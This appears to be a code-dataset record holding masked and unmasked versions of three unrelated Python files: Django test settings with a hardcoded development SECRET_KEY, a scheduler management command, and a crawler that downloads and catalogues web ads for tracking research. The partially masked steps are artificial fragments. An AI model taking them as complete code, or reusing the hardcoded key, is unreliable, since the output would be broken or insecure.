{ "blob_id": "2432e2b4da8af284055e7edf6e0bd94b7b293f0b", "index": 8601, "step-1": "<mask token>\n", "step-2": "<mask token>\nSECRET_KEY = (\n 'django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn')\nDATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql', 'NAME':\n 'puka-test', 'USER': 'jeff', 'PASSWORD': '', 'HOST': '127.0.0.1',\n 'PORT': '5432'}}\n", "step-3": "from __future__ import annotations\nfrom .base import *\nSECRET_KEY = (\n 'django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn')\nDATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql', 'NAME':\n 'puka-test', 'USER': 'jeff', 'PASSWORD': '', 'HOST': '127.0.0.1',\n 'PORT': '5432'}}\n", "step-4": "from __future__ import annotations\n\nfrom .base import * # noqa\n\nSECRET_KEY = \"django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn\"\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql\",\n \"NAME\": \"puka-test\",\n \"USER\": \"jeff\",\n \"PASSWORD\": \"\",\n \"HOST\": \"127.0.0.1\",\n \"PORT\": \"5432\",\n },\n}\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/env python # coding=utf-8 from django.core.management.base import BaseCommand from BanBanTong.utils import task_scheduler class Command(BaseCommand): ''' 启动BanBanTong.tasks定时任务 ''' def handle(self, *args, **options): task_scheduler.start()
normal
{ "blob_id": "e9c81be79d9107433e00182c27488e64f1ca779f", "index": 1458, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-3": "<mask token>\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-4": "from django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-5": "#!/usr/bin/env python\n# coding=utf-8\nfrom django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n '''\n 启动BanBanTong.tasks定时任务\n '''\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
from time import sleep from uuid import uuid1 from pprint import pprint from shutil import copy2 from multiprocessing import Process, Queue, Pool, Manager from ad_grabber_classes import * from adregex import * from pygraph.classes.digraph import digraph import os import json import jsonpickle import subprocess import cPickle import logging LOG = logging.getLogger("logAdGrabber") ADREGEX = AdRegEx() def check_duplicate(fp1, fp2): """takes two files, does a diff on them, returns True if same""" try: subprocess.check_output(['diff', fp1, fp2]) return True except subprocess.CalledProcessError: return False def identify_uniq_ads(session_results): """ i) Identify duplicate ads ii) bin the ads by their dimensions iii) Keep track of the test sites and have many times they have displayed this ad """ # bin by dimensions ads = {} notads = {} swf_bin = {} img_bin = {} error_bugs = [] for train_category, cat_dict in session_results.items(): for test_site, bug_dict_list in cat_dict.items(): for index_count in range(len(bug_dict_list)): bug_dict = bug_dict_list[index_count] for bug, bug_count in bug_dict.items(): bug_filetype = bug.get_filetype() bug_filepath = bug.get_filepath() if bug_filepath == '': #LOG.debug('did not manage to curl the scripts for bug:%s' % bug) error_bugs.append(bug) continue if bug.is_ad(): # give zerofucks to non-ads height = '999' width = '999' if bug_filetype == 'swf': # choose from the swf media bin target_bin = swf_bin try: width = subprocess.check_output(['swfdump', '-X', bug_filepath]).split(' ')[-1].strip() height = subprocess.check_output(['swfdump', '-Y', bug_filepath]).split(' ')[-1].strip() except subprocess.CalledProcessError : LOG.exception("swfdump error on file %s" % bug_filepath) else: # choose from the img media bin target_bin = img_bin LOG.debug(bug_filepath) try: height = subprocess.check_output(['identify', '-format', '"%h"',\ bug_filepath]).strip() width = subprocess.check_output(['identify', '-format','"%w"',\ bug_filepath]).strip() except subprocess.CalledProcessError: LOG.exception("identify error on file %s" % bug_filepath) try: bug.set_dimension(height, width) dimension = '%s-%s' % (height, width) # check all the images in the bin with the dimensions m_list = target_bin[dimension] dup = None for m in m_list: if check_duplicate(bug_filepath, m.get_filepath()): dup = m break if dup: # check if the duplicate ad came from a different test site if test_site in ads[dup]: ads[dup][test_site] += bug_count else : ads[dup] = {test_site : bug_count} # delete old bug reference, add new one and point to duplicated # bug del bug_dict[bug] bug_dict[dup] = bug_count else: target_bin[dimension].append(bug) ads[bug] = {test_site : bug_count} # tally up the results except KeyError: # The bin hasn't been created target_bin[dimension] = [bug] ads[bug] = {test_site : bug_count} # else: # notads return ads,error_bugs def export_uniq_ads(ads, out_folder, rel_folder): """ Takes all the uniq ads seen in this session and writes its metadata information to a csv file """ try : os.makedirs(out_folder) os.makedirs(os.path.join(out_folder, rel_folder)) except OSError: LOG.debug('Creating output folder') fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w') # Relative location = Location of the ad within this current session # Global location, added when an ad is matched with existing ads in DB fwtr.write('#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\n') for bug in ads.keys(): height, width = bug.get_dimension() filepath = bug.get_filepath() name = 
bug.get_name() src = bug.get_src() filetype = bug.get_filetype() new_uuidname = '%s.%s' % (uuid1(), filetype) bug.set_uuid(new_uuidname) new_filepath = os.path.join(out_folder, new_uuidname) rel_filepath = os.path.join(rel_folder, new_uuidname) copy2(filepath, new_filepath) fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(new_uuidname, name, filetype, height, width, rel_filepath, src)) fwtr.close() return ads def write_run_info(RUNINFO_DIR, session_date): # write to a file in runinfo_dir to tell automation script this run is done fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date) with open(fp, 'w') as fwtr: fwtr.write('OK') def write_session_info(vmid, machineid, profile, session_date, train_mode, training_sites, test_sites, num_of_refresh, export_folder): train_category = training_sites.keys()[0] train_sites_to_visit = training_sites[train_category] with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr: fwtr.write('session_str : %s\n' % session_date) fwtr.write('machine_info : %s\n' % machineid) fwtr.write('vmid : %s\n' % vmid) fwtr.write('profile : %s\n' % profile) fwtr.write('train_mode : %s\n' % train_mode) fwtr.write('num_of_refresh : %d\n' % num_of_refresh) fwtr.write('training_topic : %s\n' % train_category) fwtr.write('training_sites : ') for site in train_sites_to_visit: fwtr.write('%s, ' % site) fwtr.write('\nnum_of_train_sites : %d\n' % len(train_sites_to_visit)) fwtr.write('test_sites : ') for site in test_sites: fwtr.write('%s, ' % site[1]) fwtr.write('\nnum_of_test_sites : %d\n' % len(test_sites)) def generate_stats(results, ads, vmid, session_date, export_folder, process_ex_time): """ Generates stats on - uniq ads seen on the test sites - total number of ads seen on the test sites - total number of ads seen on all test sites - total number of uniq ads seen on all test sites """ try: os.makedirs(export_folder) except OSError: pass # to be read and inserted into db totalads = 0 # total number of ads seen during this session totaluniqads = len(ads) # does not support multicategories at this point # for each category, for each test site, count total number of ads seen totalad_category = {} # for each category, for each test site, count total number of uniq ads seen uniqad_category = {} with open(os.path.join(export_folder, 'session_bugs.csv'), 'w') as bugs_wtr: bugs_wtr.write('#Ad-UID, Website-URL, Refresh-Num, Training-Topic,\ Site-Context, BugCount, BugSrc\n') for train_category, cat_dict in results.items(): totalad_category[train_category] = {} uniqad_category[train_category] = {} for test_site, bug_dict_list in cat_dict.items(): total_ads = 0 # for each site uniq_ads = [] # for each site for refresh_num in range(len(bug_dict_list)): bug_dict = bug_dict_list[refresh_num] for bug, bugcount in bug_dict.items(): if bug.is_ad(): uuid = bug.get_uuid() bugs_wtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(uuid, test_site, refresh_num, train_category, 'N/A', bugcount, bug.get_src())) total_ads += bugcount if bug not in uniq_ads: uniq_ads.append(bug) totalad_category[train_category][test_site] = total_ads uniqad_category[train_category][test_site] = len(uniq_ads) totalads += total_ads # global count for total ads with open(os.path.join(export_folder, 'session_stats.csv'), 'w') as ses_wtr: # write some metadata information about this session ses_wtr.write('#VMID: %s\n' % vmid) ses_wtr.write('#Session-Date: %s\n' % session_date) ses_wtr.write('#Time to complete: %s\n' % process_ex_time) ses_wtr.write('#Training Categories: %s\n' % 
str(results.keys())) ses_wtr.write('#Total Number of ads: %d\n' % totalads) ses_wtr.write('#Total Uniq ads: %d\n\n' % totaluniqads) ses_wtr.write('#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\n') for train_category, cat_dict in results.items(): for test_site, bug_dict_list in cat_dict.items(): num_of_visit = len(bug_dict_list) ses_wtr.write('{0}, {1}, {2}, {3}, {4}\n'.format(train_category, test_site, num_of_visit, totalad_category[train_category][test_site], uniqad_category[train_category][test_site])) def export_ads(results,out_folder): """ This function creates a csv file which contains all the unique ads seen in each test site (including all the refreshes) TODO update the doc results is a dictionary of the following results = { Category : Value, ... } value = { test_site_url : [ result1, result2, ... resultN], ... } resultN : { WebBug : count, ... } """ try: os.makedirs(out_folder) except OSError: LOG.debug('Creating output file folder ...') export_ad_counter = 1 # assign unique number to ads for export to mturk #short_listed_companies = ['google adsense', 'doubleclick'] with open(os.path.join(out_folder,'ad_labelling.csv'), 'w') as fwtr: # write the titles fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\n'.format(\ 'Ad#', 'Company', 'FileType', 'Ad-Category', 'Website-URL',\ 'Refresh-Num','Training-Topic', 'Context-of-site', 'Total', 'Ad-src')) # make sure we only add one ad for train_category, cat_dict in results.items(): for test_site, bug_dict_list in cat_dict.items(): for refresh_num in range(len(bug_dict_list)): bug_dict = bug_dict_list[refresh_num] for bug, bugcount in bug_dict.items(): if not bug.is_ad(): #TODO check bug_type in ffext continue if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']: file_name = '%d.%s' % (export_ad_counter, bug.get_filetype()) new_location = os.path.join(out_folder, file_name) copy2(bug.get_filepath(), new_location) fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9},\ \n'.format(file_name, bug.get_name(), bug.get_filetype(), '' ,test_site, refresh_num, train_category, 'N/A', bugcount, bug.get_src())) export_ad_counter += 1 def get_bug_type(file_type): is_ad = False bug_type = 'text' if file_type.startswith('HTML') or \ file_type.startswith('ASCII') or \ file_type.startswith('UTF-8 Unicode English') or \ file_type.startswith('very short') : bug_type = 'text' elif (file_type.endswith('1 x 1') and file_type.startswith('GIF')): bug_type = 'gif' elif file_type.startswith('PNG'): bug_type = 'png' is_ad = True elif file_type.startswith('GIF'): bug_type = 'gif' is_ad = True elif file_type.startswith('Macromedia Flash'): bug_type = 'swf' is_ad = True elif file_type.startswith('JPEG'): bug_type = 'jpg' is_ad = True return bug_type, is_ad def parse_buginfo(entry): """ Takes the json decoded bug information and inserts it into a WebBug instance """ bugname = entry['bug']['name'].replace(' ','').replace('/','_') bugsrc = entry['ent']['policyContentLocation'] bugpattern = entry['bug']['pattern'] try : bugaffiliation = entry['bug']['affiliation'] except KeyError: bugaffiliation = "" bugtype = entry['bug']['type'] bugpathname = entry['ent']['pathname'] return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation, bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname) def curl_worker_legacy(args): output_dir = args[0] saved_file_name = args[1] path = args[2] bug = args[3] curl_result_queue = args[4] # subprocess.call(['curl', '-o', path , bug.get_src() ]) subprocess.call(['wget', '-t', '1', '-q', '-T', 
'3', '-O', path , bug.get_src()]) # Use the unix tool 'file' to check filetype subpr_out = subprocess.check_output(['file', '-b', path]).strip() filetype, is_ad = get_bug_type(subpr_out) if is_ad: new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype)) else: new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\ filetype)) os.rename(path, new_path) bug.set_is_ad(is_ad) bug.set_filetype(filetype) bug.set_filepath(new_path) curl_result_queue.put(bug) def process_results_legacy(refresh_count, output_dir, ext_queue, result_queue,\ num_of_workers=8): """ This function goes through all the bugs identified by the firefox plugin and aggregates each bug's occurence in a given page. The aggregation is necessary for duplicate ads on the same page """ bug_dict = {} # dict to keep track of how many duplicates of each bug, if # exists try: # separate the non-ads from the ads for ease of handchecking os.makedirs(output_dir) os.makedirs(os.path.join(output_dir, 'notad')) except OSError: pass # uses a pool of 'curl' workers curl_worker_pool = Pool(processes=num_of_workers) manager = Manager() curl_result_queue = manager.Queue() dl_counter = 0 # keep track of how many bugs downloaded while True: try: found_bugs = json.loads(ext_queue.get(block=True, timeout=2)) except Exception: LOG.debug('Timing out on get from queue...') break for entry in found_bugs: bugname = entry['bug']['name'].replace(' ','').replace('/','_') bugsrc = entry['ent']['policyContentLocation'] bugpattern = entry['bug']['pattern'] try : bugaffiliation = entry['bug']['affiliation'] except KeyError: bugaffiliation = "" bugtype = entry['bug']['type'] bugpathname = entry['ent']['pathname'] bug = WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation, bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname) try: # matched an entry in the bugdict, incr count and continue bug_dict[bug] += 1 continue except KeyError: bug_dict[bug] = 1 saved_location ='Visit%d_%s%d' % (refresh_count, bugname,\ dl_counter) dl_counter += 1 save_to_path = os.path.join( output_dir, '%s' % saved_location) obj = curl_worker_pool.apply_async(curl_worker_legacy, \ ((output_dir, saved_location, save_to_path, bug, curl_result_queue),)) try: sleep(0.5) curl_worker_pool.join() curl_worker_pool.close() curl_worker_pool.terminate() except Exception: LOG.debug('Closing pool') while not curl_result_queue.empty(): cbug = curl_result_queue.get() # ugly code here bugcount = bug_dict[cbug] del bug_dict[cbug] bug_dict[cbug] = bugcount with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr: cPickle.dump(bug_dict, fwtr) result_queue.put(bug_dict) def curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\ ack_queue): while True: try: task = input_queue.get() if len(task) == 1 and task[0] == "STOP": LOG.debug('curl_worker %d received stop' % worker_id) break except Exception: LOG.error('Error:') #LOG.debug(task) saved_file_name = task[0] path = task[1] bug = task[2] try: # subprocess.call(['curl', '-o', path , bug.get_src()]) subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()]) subpr_out = subprocess.check_output(['file', '-b', path]).strip() except Exception as e : LOG.debug('Exception captured %s\n\n' % e) filetype, is_ad = get_bug_type(subpr_out) if is_ad: new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype)) else: new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\ filetype)) os.rename(path, new_path) 
bug.set_is_ad(is_ad) bug.set_filetype(filetype) bug.set_filepath(new_path) worker_output_queue.put(bug) ack_queue.put(worker_id) return def build_nodes(jsonData): """ This function takes a JSON encoded output of the firefox addon and builds a call graph for the javascript/HTML redirections @rtype nodes: dict @return: A graph of redirection chains """ nodes = {} def _process_cookiestr(cookieStr): """ parses a dictionary of req/resp calls to extract the cookie information returns a list of cookies set on this domain """ cookie_list = [] # parses cookie str if a cookie has been set for cookie in cookieStr.split('\n'): c = {} for cook in cookie.split(';'): token = cook.split('=', 1) if len(token) < 2: # usually this is just a flag e.g HTTPOnly, HTTPSOnly continue c[token[0]] = token[1] cookie_list.append(c) return cookie_list def _check_node(d): try: domain_node = nodes[d] except KeyError: isBug, bug_name, bug_type = ADREGEX.search(domain) domain_node = WebNode(domain, isBug, bug_name, bug_type) nodes[d] = domain_node return domain_node #jsonData contains all the domains and all the req/resp pairs made to them #iterating over the domains first for domain, dval in jsonData.items(): # but first check if a node for this domain has been created or not domain_node = _check_node(domain) cookie_list = [] # iterating thru all the req/resp pairs on a domain for info in dval: domainPath = info['domainPath'] referrerPath = info['referrerPath'] referrer = info['referrer'] cookieBool = info['cookie'] parsed_cookie = None if cookieBool: cookieStr = info['cookiestr'] parsed_cookie = _process_cookiestr(cookieStr) cookie_list.append(parsed_cookie) domain_node.add_reqresp({'domainPath' : domainPath, 'referrer' : referrer, 'referrerPath' : referrerPath, 'cookieList' : parsed_cookie }) # making sure that we also create the node for the referrer referrer_node = _check_node(referrer) referrer_node.add_child(domain_node) domain_node.add_parent(referrer_node) domain_node.set_cookies(cookie_list) return nodes def filter_results(extQueue, timeout_value, url): """ This function takes the JSON output of the firefox addon, and matches the request URL against a list of known tracker/ads regexes. Returns data structure containing request/resp info Returns None if did not receive results from FF addon """ from Queue import Empty try: LOG.debug('Timeout value in filter_result :%d' % timeout_value) nodes = extQueue.get(True, timeout=timeout_value) except Empty as e: LOG.info('Did not receive any results from FF plugin for %s' % url) nodes = None finally: while not extQueue.empty(): extQueue.get() return nodes def process_results(refresh_count, output_dir, ext_queue, result_queue, num_of_workers=8): """ This function goes through all the bugs identified by the firefox plugin and aggregates each bug's occurence in a given page. 
The aggregation is necessary
    for duplicate ads on the same page
    """
    workers_dict = {}             # keep track of worker processes
    input_queue = Queue()         # asynchronously feed workers tasks to do
    worker_output_queue = Queue() # output queue from workers
    ack_queue = Queue()
    bug_dict = {}  # dict to keep track of how many duplicates of each bug, if
                   # exists
    try:
        # separate the non-ads from the ads for ease of handchecking
        os.makedirs(output_dir)
        os.makedirs(os.path.join(output_dir, 'notad'))
    except OSError:
        # Directory is created, okay to pass
        pass

    for i in range(num_of_workers):
        p = Process(target=curl_worker, args=(output_dir, input_queue,
                    worker_output_queue, i, ack_queue))
        p.start()
        workers_dict[i] = p

    # uses a pool of 'curl' workers
    # curl_worker_pool = Pool(processes=8)
    # manager = Manager()
    # curl_result_queue = manager.Queue()

    dl_counter = 0  # keep track of how many bugs downloaded
    while True:
        try:
            found_bugs = json.loads(ext_queue.get(block=True, timeout=2))
        except Exception:
            LOG.debug('No more bugs found, break out of queue')
            break

        for entry in found_bugs:
            bug = parse_buginfo(entry)
            try:
                # matched an entry in the bugdict, incr count and continue
                bug_dict[bug] += 1
                continue
            except KeyError:
                bug_dict[bug] = 1

            try:
                saved_location = 'Visit%d_%s%d' % (refresh_count,
                                                   bug.get_name(), dl_counter)
                dl_counter += 1
                save_to_path = os.path.join(output_dir, '%s' % saved_location)
                input_queue.put((saved_location, save_to_path, bug))
            except Exception as e:
                LOG.exception('%s' % e)

    for i in range(num_of_workers):
        # send stop signal
        input_queue.put(("STOP",))

    stopped = 0
    while stopped < len(workers_dict):
        ack = ack_queue.get()
        p = workers_dict[ack]
        p.join(timeout=1)
        if p.is_alive():
            p.terminate()
            LOG.debug('terminating process %d' % ack)
        stopped += 1

    while not worker_output_queue.empty():
        # receive results from the worker
        cbug = worker_output_queue.get()
        # ugly: re-key with the updated bug object (it now carries filetype/filepath)
        bugcount = bug_dict[cbug]
        del bug_dict[cbug]
        bug_dict[cbug] = bugcount

    with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:
        cPickle.dump(bug_dict, fwtr)
    result_queue.put(bug_dict)
    return
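

# ---------------------------------------------------------------------------
# Illustrative driver (sketch only, not part of the original pipeline): shows
# how the helpers above are typically wired together for a single visit to a
# test site. The names '_example_single_visit', 'example-topic',
# 'example-site.com' and the output directory are assumptions made up for the
# example; ext_queue is expected to be fed with the JSON produced by the
# Firefox extension, exactly as process_results() already assumes.
# ---------------------------------------------------------------------------
def _example_single_visit(ext_queue, refresh_count=0,
                          output_dir='/tmp/ad_grabber_example'):
    """Sketch: drain one visit's bugs, then bin and export the unique ads."""
    manager = Manager()
    result_queue = manager.Queue()
    # download and classify every bug reported for this refresh
    process_results(refresh_count, output_dir, ext_queue, result_queue,
                    num_of_workers=4)
    bug_dict = result_queue.get()
    # wrap the single visit in the nested structure the exporters expect:
    # {train_category: {test_site: [bug_dict_per_refresh, ...]}}
    session_results = {'example-topic': {'example-site.com': [bug_dict]}}
    ads, error_bugs = identify_uniq_ads(session_results)
    export_uniq_ads(ads, os.path.join(output_dir, 'uniq_ads'), 'rel')
    return ads, error_bugs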
normal
{ "blob_id": "fdae984f7cf5e1c20dee197d3f2518a0c7c38bdc", "index": 8085, "step-1": "<mask token>\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\n<mask token>\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results 
is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\n<mask token>\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. 
The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\n<mask token>\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. 
